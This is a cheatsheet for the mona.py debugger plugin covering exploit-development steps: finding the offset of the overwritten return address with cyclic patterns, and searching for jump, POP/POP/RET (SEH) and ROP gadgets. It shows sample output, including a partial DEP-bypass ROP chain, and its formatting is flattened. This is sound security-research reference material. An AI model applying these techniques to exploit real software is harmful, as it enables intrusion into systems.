1. ===========================A LITTLE MONA.PY CHEATSHEET===========================Last Modify: 08/12/2011Author: luca.mella@studio.unibo.it*************************************************************************** Configuration ******************************************************************************************************************************!mona config -set workingfolder c:logs%pSet the current working directory. Mona will put output here.You might use -get alse for retrive current working folder.(%p means processname)-cm =true/falsesafesehaslrosrebase*************************************************************************** General searching options ******************************************************************************************************************-cp ,nonullunicode00xx00yyasciiasciiprintupperloweruppernumlowernumnumericalphanumstartswithnull00xxyyzz-cpb Exclude specified badchars from pointer search-p Number of pointers to return-x R,W,X,RW,RX,WX,RWX,* pointers that point to a segment with specifiedaccess level*************************************************************************** Pattern ************************************************************************************************************************************!mona pc Create a cyclic pattern of bytes. Same of "msf_pattern" in metasploit!mona po find the offset of specified bytes in cyclic pattern

2. *************************************************************************** After a crash with cyclic pattern payload **************************************************************************************************!mona suggest Watch for output.. EIP overwritten with normal pattern : 0x37694136 (offset 260) !!! %EBP+4 ESP (0x0018f574) points at offset 264 in normal pattern (length 736) EBP overwritten with normal pattern : 0x69413569 (offset 256) EBX (0x0018f580) points at offset 276 in normal pattern (length 724)--- output ---0BADF00D [+] Processing arguments and criteria0BADF00D - Pointer access level : X0BADF00D [+] Looking for cyclic pattern in memory750F0000 Modules C:WindowsSystem32wshtcpip.dll0BADF00D Cyclic pattern (normal) found at 0x0018f46c (length 1000bytes)0BADF00D Cyclic pattern (normal) found at 0x001c3961 (length 1000bytes)0BADF00D [+] Examining registers0BADF00D EIP overwritten with normal pattern : 0x37694136 (offset 260)0BADF00D ESP (0x0018f574) points at offset 264 in normal pattern(length 736)0BADF00D EBP overwritten with normal pattern : 0x69413569 (offset 256)0BADF00D EBX (0x0018f580) points at offset 276 in normal pattern(length 724)0BADF00D [+] Examining SEH chain0BADF00D [+] Examining stack0BADF00D Pointer into normal cyclic pattern at ESP-0x1e8 (-488) :0x0018f580 : offset 276, length 7240BADF00D Pointer into normal cyclic pattern at ESP-0x19c (-412) :0x001c396d : offset 12, length 9880BADF00D Pointer into normal cyclic pattern at ESP-0x174 (-372) :0x0018f46c : offset 0, length 10000BADF00D Pointer into normal cyclic pattern at ESP-0x170 (-368) :0x001c396d : offset 12, length 9880BADF00D Pointer into normal cyclic pattern at ESP-0x164 (-356) :0x0018f580 : offset 276, length 7240BADF00D Pointer into normal cyclic pattern at ESP-0x154 (-340) :0x0018f56c : offset 256, length 7440BADF00D Pointer into normal cyclic pattern at ESP-0x134 (-308) :0x0018f580 : offset 276, length 7240BADF00D Pointer into normal cyclic pattern at ESP-0x114 (-276) :0x0018f46c : offset 0, length 10000BADF00D Pointer into normal cyclic pattern at ESP-0x110 (-272) :0x0018f46c : offset 0, length 10000BADF00D Pointer into normal cyclic pattern at ESP-0x10c (-268) :0x0018f580 : offset 276, length 7240BADF00D [+] Preparing log file exploit.rb0BADF00D - (Re)setting logfile C:mona_logsexploit.rb0BADF00D [+] Generating module info table, hang on...0BADF00D - Processing modules0BADF00D - Done. Lets rock n roll.--- end of output --- 3. *************************************************************************** Finding things in memory *******************************************************************************************************************!mona findFind a sequence of bytes in memory.Mandatory argument : -s : the sequence to search for.-type : Type of pattern to search for : bin,asc,ptr,instr,file-b : the bottom of the search range-t : the top of the search range-c : skip consecutive pointers but show length of the pattern instead-p2p : show pointers to pointers to the pattern (might take a while !)-r : if p2p is used, you can tell the find to also find closepointers by specifying -r with a value.This value indicates the number of bytes to stepbackwards for each search!mona find -type instr -s "jmp ebx" -m ntdll.dll--- output ---Search into module ntdll.dllSearch for "jmp ebx" as assembly instructionResult:0x77e5172b (b+0x0007172b) : "jmp ebx" | {PAGE_EXECUTE_READ} [ntdll.dll]ASLR: True, Rebase: True,SafeSEH: True, OS: True,v6.1.7600.16385 (C:WindowsSysWOW64ntdll.dll)--- end of output ---*************************************************************************** Assemble instructions **********************************************************************************************************************!mona assemble -s "nop" Return the opcode of specified instructions (chain with #).*************************************************************************** Searching for POP/POP/RET instruction (SEH exploiting) ***********************************************************************************!mona seh Find POP POP RET instruction into program memory. This statements could be used in SEH exploiting. --- output --- 0BADF00D [+] Writing results to C:mona_logsseh.txt 0BADF00D - Number of pointers of type pop ebx # pop eax # ret: 3 0BADF00D - Number of pointers of type pop esi # pop edi # ret: 3 0BADF00D - Number of pointers of type pop ecx # pop ebx # ret: 1 0BADF00D - Number of pointers of type pop ebx # pop ebp # ret: 3 0BADF00D - Number of pointers of type pop ebx # pop eax # ret 04 : 2 0BADF00D - Number of pointers of type pop ebx # pop ecx # ret: 15 0BADF00D - Number of pointers of type pop ecx # pop edi # ret: 1 0BADF00D - Number of pointers of type pop ebx # pop ecx # ret 0c : 1 0BADF00D - Number of pointers of type pop esi # pop ebx # ret: 6 0BADF00D - Number of pointers of type jmp dword ptr ss:[esp+14] : 1 0BADF00D - Number of pointers of type pop esi # pop ebx # ret 08 : 2 4. 0BADF00D - Numberof pointers of type call dword ptr ss:[ebp-04] : 1 0BADF00D - Numberof pointers of type pop esi # pop ebx # ret 04 : 2 0BADF00D - Numberof pointers of type call dword ptr ss:[esp+14] : 1 0BADF00D - Numberof pointers of type pop ebx # pop ecx # ret 04 : 14 0BADF00D - Numberof pointers of type call dword ptr ss:[ebp-18] : 1 0BADF00D - Numberof pointers of type pop edi # pop ebx # ret: 1 [..] --- end of output ---*************************************************************************** ROP based exploit *******************************************************************************************************!mona rop -m Analyze memory prepare several lists of ROP valid gadget (any INSTR + RETsequence), stack pivots, rop functions,Generate a ROP chain aimed to bypass DEP (call to VirtualProtect with PUSHADtechnique), and suggest wich addressneed to be fixed for make it works. NOTE:Watch "C:mona_logsrop_suggestion.txt" for a clear gadget list.Watch "C:mona_logsrop_virtualprotect.txt" for a starting point foryour rop payload (aimed to DEP bypass).Watch "C:mona_logsstack_pivot.txt" for a list of gadget that permitto change ESP.--- output --- ---------- Mona command started on 2011-07-21 10:58:09 ---------- [..] VirtualProtect register structure (PUSHAD technique) ---------------------------------------------------- EAX = NOP (0x90909090) ECX = lpOldProtect (Writable ptr) EDX = NewProtect (0x40) EBX = Size ESP = lPAddress (automatic) EBP = ReturnTo (ptr to jmp esp - run !mona jmp -r esp -n -o) ESI = ptr to VirtualProtect() EDI = ROP NOP (RETN) VirtualProtect() pushad rop chain ------------------------------------ rop_gadgets = [ 0x00404880,# POP ECX # RETN (server.exe) 0x????????,# edx)0x00404a84,# POP EAX # RETN (server.exe)0x90909090,# NOPS (-> eax)0x004022e0,# PUSHAD # RETN (server.exe)# rop chain generated by mona.py# note : this chain may not work out of the box# you may have to change order or fix somegadgets,# but it should give you a head start].pack("V*") [..] --- end of output ---======================================================================================Reference:https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/https://www.corelan.be/index.php/2011/05/12/hack-notes-ropping-eggs-for-breakfast/